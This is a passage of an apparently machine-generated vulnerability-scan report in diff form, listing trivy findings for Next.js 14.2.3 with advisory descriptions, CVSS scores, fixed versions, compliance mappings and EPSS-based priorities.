vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 13.341866666666666, + "epss": 0.00016, + "epss_percentile": 0.03853, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.00064, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "4721ee25bf757892", + "ruleId": "CVE-2026-44577", + "severity": "MEDIUM", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "Next.js has a Denial of Service in the Image Optimization API", + "title": "CVE-2026-44577", + "description": "Next.js is a React framework for building full-stack web applications. From 10.0.0 to before 15.5.16 and 16.2.5, when self-hosting Next.js with the default image loader, the Image Optimization API fetches local images entirely into memory without enforcing a maximum size limit. An attacker could cause out-of-memory conditions by requesting large local assets from the /_next/image endpoint that match the images.localPatterns configuration (by default, all patterns are allowed). This vulnerability is fixed in 15.5.16 and 16.2.5.", + "remediation": "https://avd.aquasec.com/nvd/cve-2026-44577", + "references": [], + "tags": [ + "vulnerability", + "pkg:next@14.2.3" + ], + "risk": { + "cwe": [ + "CWE-770" + ] + }, + "raw": { + "VulnerabilityID": "CVE-2026-44577", + "VendorIDs": [ + "GHSA-h64f-5h5j-jqjh" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "15.5.16, 16.2.5", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44577", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:9f08da120547fe06a6ff340ef05ca8e057af610a1e77041d7d119d2cea50fca0", + "Title": "Next.js has a Denial of Service in the Image Optimization API", + "Description": "Next.js is a React framework for building full-stack web applications. From 10.0.0 to before 15.5.16 and 16.2.5, when self-hosting Next.js with the default image loader, the Image Optimization API fetches local images entirely into memory without enforcing a maximum size limit. An attacker could cause out-of-memory conditions by requesting large local assets from the /_next/image endpoint that match the images.localPatterns configuration (by default, all patterns are allowed). This vulnerability is fixed in 15.5.16 and 16.2.5.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-770" + ], + "VendorSeverity": { + "ghsa": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 5.9 + } + }, + "References": [ + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/releases/tag/v15.5.16", + "https://github.com/vercel/next.js/releases/tag/v16.2.5", + "https://github.com/vercel/next.js/security/advisories/GHSA-h64f-5h5j-jqjh", + "https://nvd.nist.gov/vuln/detail/CVE-2026-44577" + ], + "PublishedDate": "2026-05-13T17:16:23.173Z", + "LastModifiedDate": "2026-05-13T20:00:59.993Z" + }, + "context": { + "sbom": { + "name": "next", + "version": "14.2.3", + "path": "/package-lock.json" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 13.342933333333333, + "epss": 0.00018, + "epss_percentile": 0.0459, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.00072, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "550fe8bea52b0c14", + "ruleId": "CVE-2026-44580", + "severity": "MEDIUM", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "Next.js has cross-site scripting in beforeInteractive scripts with untrusted input", + "title": "CVE-2026-44580", + "description": "Next.js is a React framework for building full-stack web applications. From 13.0.0 to before 15.5.16 and 16.2.5, applications that use beforeInteractive scripts together with untrusted content can be vulnerable to cross-site scripting. In affected versions, serialized script content was not escaped safely before being embedded into the document, which could allow attacker-controlled input to break out of the intended script context and execute arbitrary JavaScript in a visitor's browser. This vulnerability is fixed in 15.5.16 and 16.2.5.", + "remediation": "https://avd.aquasec.com/nvd/cve-2026-44580", + "references": [], + "tags": [ + "vulnerability", + "pkg:next@14.2.3" + ], + "risk": { + "cwe": [ + "CWE-79" + ] + }, + "raw": { + "VulnerabilityID": "CVE-2026-44580", + "VendorIDs": [ + "GHSA-gx5p-jg67-6x7h" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "15.5.16, 16.2.5", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44580", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:271ac03a6853a4a85c0ed6629628a269cc75c889ec605033b36b7d5a63fe43fb", + "Title": "Next.js has cross-site scripting in beforeInteractive scripts with untrusted input", + "Description": "Next.js is a React framework for building full-stack web applications. From 13.0.0 to before 15.5.16 and 16.2.5, applications that use beforeInteractive scripts together with untrusted content can be vulnerable to cross-site scripting. In affected versions, serialized script content was not escaped safely before being embedded into the document, which could allow attacker-controlled input to break out of the intended script context and execute arbitrary JavaScript in a visitor's browser. This vulnerability is fixed in 15.5.16 and 16.2.5.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-79" + ], + "VendorSeverity": { + "ghsa": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "V3Score": 6.1 + } + }, + "References": [ + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/releases/tag/v15.5.16", + "https://github.com/vercel/next.js/releases/tag/v16.2.5", + "https://github.com/vercel/next.js/security/advisories/GHSA-gx5p-jg67-6x7h", + "https://nvd.nist.gov/vuln/detail/CVE-2026-44580" + ], + "PublishedDate": "2026-05-13T18:16:18.26Z", + "LastModifiedDate": "2026-05-14T18:33:34.17Z" + }, + "context": { + "sbom": { + "name": "next", + "version": "14.2.3", + "path": "/package-lock.json" + } + }, + "compliance": { + "owaspTop10_2021": [ + "A03:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-79", + "rank": 1, + "category": "Injection" + } + ], + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "DETECT", + "category": "DE.CM", + "subcategory": "DE.CM-8", + "description": "Vulnerability scans are performed" + }, + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.2.4", + "description": "Prevent XSS attacks in bespoke software", + "priority": "CRITICAL" + }, + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1190", + "techniqueName": "Exploit Public-Facing Application", + "subtechnique": "", + "subtechniqueName": "" + }, + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 13.339733333333335, + "epss": 0.00012, + "epss_percentile": 0.01845, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.00048, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "ffcab1bb08bb5e14", + "ruleId": "CVE-2026-44581", + "severity": "MEDIUM", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "Next.js vulnerable to cross-site scripting in App Router applications using CSP nonces", + "title": "CVE-2026-44581", + "description": "Next.js is a React framework for building full-stack web applications. From 13.4.0 to before 15.5.16 and 16.2.5, App Router applications that rely on CSP nonces can be vulnerable to stored cross-site scripting when deployed behind shared caches. In affected versions, malformed nonce values derived from request headers could be reflected into rendered HTML in an unsafe way, allowing an attacker to poison cached responses and cause script execution for later visitors. This vulnerability is fixed in 15.5.16 and 16.2.5.", + "remediation": "https://avd.aquasec.com/nvd/cve-2026-44581", + "references": [], + "tags": [ + "vulnerability", + "pkg:next@14.2.3" + ], + "risk": { + "cwe": [ + "CWE-79" + ] + }, + "raw": { + "VulnerabilityID": "CVE-2026-44581", + "VendorIDs": [ + "GHSA-ffhc-5mcf-pf4q" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "15.5.16, 16.2.5", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44581", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:6f2ba23fa5d8ac9fe972f5c6d8249e305d739b420e200ac40e762626f914dc86", + "Title": "Next.js vulnerable to cross-site scripting in App Router applications using CSP nonces", + "Description": "Next.js is a React framework for building full-stack web applications. From 13.4.0 to before 15.5.16 and 16.2.5, App Router applications that rely on CSP nonces can be vulnerable to stored cross-site scripting when deployed behind shared caches. In affected versions, malformed nonce values derived from request headers could be reflected into rendered HTML in an unsafe way, allowing an attacker to poison cached responses and cause script execution for later visitors. This vulnerability is fixed in 15.5.16 and 16.2.5.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-79" + ], + "VendorSeverity": { + "ghsa": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N", + "V3Score": 4.7 + } + }, + "References": [ + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/releases/tag/v15.5.16", + "https://github.com/vercel/next.js/releases/tag/v16.2.5", + "https://github.com/vercel/next.js/security/advisories/GHSA-ffhc-5mcf-pf4q", + "https://nvd.nist.gov/vuln/detail/CVE-2026-44581" + ], + "PublishedDate": "2026-05-13T18:16:18.4Z", + "LastModifiedDate": "2026-05-14T18:30:24.34Z" + }, + "context": { + "sbom": { + "name": "next", + "version": "14.2.3", + "path": "/package-lock.json" + } + }, + "compliance": { + "owaspTop10_2021": [ + "A03:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-79", + "rank": 1, + "category": "Injection" + } + ], + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "DETECT", + "category": "DE.CM", + "subcategory": "DE.CM-8", + "description": "Vulnerability scans are performed" + }, + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.2.4", + "description": "Prevent XSS attacks in bespoke software", + "priority": "CRITICAL" + }, + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1190", + "techniqueName": "Exploit Public-Facing Application", + "subtechnique": "", + "subtechniqueName": "" + }, + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 13.352000000000002, + "epss": 0.00035, + "epss_percentile": 0.10495, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0014, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "f36c532127e73145", + "ruleId": "CVE-2025-32421", + "severity": "LOW", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "next.js: Next.js Race Condition to Cache Poisoning", + "title": "CVE-2025-32421", + "description": "Next.js is a React framework for building full-stack web applications. Versions prior to 14.2.24 and 15.1.6 have a race-condition vulnerability. This issue only affects the Pages Router under certain misconfigurations, causing normal endpoints to serve `pageProps` data instead of standard HTML. This issue was patched in versions 15.1.6 and 14.2.24 by stripping the `x-now-route-matches` header from incoming requests. Applications hosted on Vercel's platform are not affected by this issue, as the platform does not cache responses based solely on `200 OK` status without explicit `cache-control` headers. Those who self-host Next.js deployments and are unable to upgrade immediately can mitigate this vulnerability by stripping the `x-now-route-matches` header from all incoming requests at the content development network and setting `cache-control: no-store` for all responses under risk. The maintainers of Next.js strongly recommend only caching responses with explicit cache-control headers.", + "remediation": "https://avd.aquasec.com/nvd/cve-2025-32421", + "references": [], + "tags": [ + "vulnerability", + "pkg:next@14.2.3" + ], + "risk": { + "cwe": [ + "CWE-362" + ] + }, + "raw": { + "VulnerabilityID": "CVE-2025-32421", + "VendorIDs": [ + "GHSA-qpjv-v59x-3qc4" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "14.2.24, 15.1.6", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-32421", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:64a9f428dd88df3e06576561410dff61f0fec0914799e7cfd4827204eba10d1b", + "Title": "next.js: Next.js Race Condition to Cache Poisoning", + "Description": "Next.js is a React framework for building full-stack web applications. Versions prior to 14.2.24 and 15.1.6 have a race-condition vulnerability. This issue only affects the Pages Router under certain misconfigurations, causing normal endpoints to serve `pageProps` data instead of standard HTML. This issue was patched in versions 15.1.6 and 14.2.24 by stripping the `x-now-route-matches` header from incoming requests. Applications hosted on Vercel's platform are not affected by this issue, as the platform does not cache responses based solely on `200 OK` status without explicit `cache-control` headers. Those who self-host Next.js deployments and are unable to upgrade immediately can mitigate this vulnerability by stripping the `x-now-route-matches` header from all incoming requests at the content development network and setting `cache-control: no-store` for all responses under risk. The maintainers of Next.js strongly recommend only caching responses with explicit cache-control headers.", + "Severity": "LOW", + "CweIDs": [ + "CWE-362" + ], + "VendorSeverity": { + "ghsa": 1, + "redhat": 1 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", + "V3Score": 3.7 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", + "V3Score": 3.7 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2025-32421", + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/security/advisories/GHSA-qpjv-v59x-3qc4", + "https://nvd.nist.gov/vuln/detail/CVE-2025-32421", + "https://vercel.com/changelog/cve-2025-32421", + "https://www.cve.org/CVERecord?id=CVE-2025-32421" + ], + "PublishedDate": "2025-05-14T23:15:47.87Z", + "LastModifiedDate": "2025-09-10T15:16:10.053Z" + }, + "context": { + "sbom": { + "name": "next", + "version": "14.2.3", + "path": "/package-lock.json" + } + }, + "compliance": { + "cweTop25_2024": [ + { + "id": "CWE-362", + "rank": 21, + "category": "Race Condition" + } + ], + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 6.867200000000001, + "epss": 0.00752, + "epss_percentile": 0.73386, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 2, + "epss_multiplier": 1.03008, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "1ce95f8bcd69d427", + "ruleId": "CVE-2025-48068", + "severity": "LOW", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "next.js: Information exposure in Next.js dev server due to lack of origin verification", + "title": "CVE-2025-48068", + "description": "Next.js is a React framework for building full-stack web applications. In versions starting from 13.0 to before 14.2.30 and 15.0.0 to before 15.2.2, Next.js may have allowed limited source code exposure when the dev server was running with the App Router enabled. The vulnerability only affects local development environments and requires the user to visit a malicious webpage while npm run dev is active. This issue has been patched in versions 14.2.30 and 15.2.2.", + "remediation": "https://avd.aquasec.com/nvd/cve-2025-48068", + "references": [], + "tags": [ + "vulnerability", + "pkg:next@14.2.3" + ], + "risk": { + "cwe": [ + "CWE-1385" + ] + }, + "raw": { + "VulnerabilityID": "CVE-2025-48068", + "VendorIDs": [ + "GHSA-3h52-269p-cp9r" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "15.2.2, 14.2.30", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-48068", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:69e57f7a20f65a73ee7bd893aee36db195599076d8c92184edf8fe2c2707d9a6", + "Title": "next.js: Information exposure in Next.js dev server due to lack of origin verification", + "Description": "Next.js is a React framework for building full-stack web applications. In versions starting from 13.0 to before 14.2.30 and 15.0.0 to before 15.2.2, Next.js may have allowed limited source code exposure when the dev server was running with the App Router enabled. The vulnerability only affects local development environments and requires the user to visit a malicious webpage while npm run dev is active. This issue has been patched in versions 14.2.30 and 15.2.2.", + "Severity": "LOW", + "CweIDs": [ + "CWE-1385" + ], + "VendorSeverity": { + "ghsa": 1, + "nvd": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N", + "V40Score": 2.3 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", + "V3Score": 4.3 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", + "V3Score": 4.3 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2025-48068", + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/security/advisories/GHSA-3h52-269p-cp9r", + "https://nvd.nist.gov/vuln/detail/CVE-2025-48068", + "https://vercel.com/changelog/cve-2025-48068", + "https://www.cve.org/CVERecord?id=CVE-2025-48068" + ], + "PublishedDate": "2025-05-30T04:15:48.51Z", + "LastModifiedDate": "2025-09-10T15:17:38.677Z" + }, + "context": { + "sbom": { + "name": "next", + "version": "14.2.3", + "path": "/package-lock.json" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 6.693600000000001, + "epss": 0.00101, + "epss_percentile": 0.2732, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 2, + "epss_multiplier": 1.00404, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "e32b41f01db1c199", + "ruleId": "CVE-2026-44572", + "severity": "LOW", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "Next.js's Middleware / Proxy redirects can be cache-poisoned", + "title": "CVE-2026-44572", + "description": "Next.js is a React framework for building full-stack web applications. From 12.2.0 to before 15.5.16 and 16.2.5, an external client could send a x-nextjs-data header on a normal request to a path handled by middleware that returns a redirect. When that happened, the middleware/proxy could treat the request as a data request and replace the standard Location redirect header with the internal x-nextjs-redirect header. Browsers do not follow x-nextjs-redirect, so the response became an unusable redirect for normal clients. If the application was deployed behind a CDN or reverse proxy that caches 3xx responses without varying on this header, a single attacker request could poison the cached redirect response for the affected path. Subsequent visitors could then receive a cached redirect response without a Location header, causing a denial of service for that redirect path until the cache entry expired or was purged. This vulnerability is fixed in 15.5.16 and 16.2.5.", + "remediation": "https://avd.aquasec.com/nvd/cve-2026-44572", + "references": [], + "tags": [ + "vulnerability", + "pkg:next@14.2.3" + ], + "risk": { + "cwe": [ + "CWE-349" + ] + }, + "raw": { + "VulnerabilityID": "CVE-2026-44572", + "VendorIDs": [ + "GHSA-3g8h-86w9-wvmq" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "15.5.16, 16.2.5", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44572", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:7a874ea313c88fdfc018ce40fae507cbe374abff06d472b78d118b05b82c32ac", + "Title": "Next.js's Middleware / Proxy redirects can be cache-poisoned", + "Description": "Next.js is a React framework for building full-stack web applications. From 12.2.0 to before 15.5.16 and 16.2.5, an external client could send a x-nextjs-data header on a normal request to a path handled by middleware that returns a redirect. When that happened, the middleware/proxy could treat the request as a data request and replace the standard Location redirect header with the internal x-nextjs-redirect header. Browsers do not follow x-nextjs-redirect, so the response became an unusable redirect for normal clients. If the application was deployed behind a CDN or reverse proxy that caches 3xx responses without varying on this header, a single attacker request could poison the cached redirect response for the affected path. Subsequent visitors could then receive a cached redirect response without a Location header, causing a denial of service for that redirect path until the cache entry expired or was purged. This vulnerability is fixed in 15.5.16 and 16.2.5.", + "Severity": "LOW", + "CweIDs": [ + "CWE-349" + ], + "VendorSeverity": { + "ghsa": 1, + "nvd": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L", + "V3Score": 3.7 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 5.9 + } + }, + "References": [ + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/releases/tag/v15.5.16", + "https://github.com/vercel/next.js/releases/tag/v16.2.5", + "https://github.com/vercel/next.js/security/advisories/GHSA-3g8h-86w9-wvmq", + "https://nvd.nist.gov/vuln/detail/CVE-2026-44572" + ], + "PublishedDate": "2026-05-13T16:16:58.8Z", + "LastModifiedDate": "2026-05-15T15:46:08.98Z" + }, + "context": { + "sbom": { + "name": "next", + "version": "14.2.3", + "path": "/package-lock.json" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": 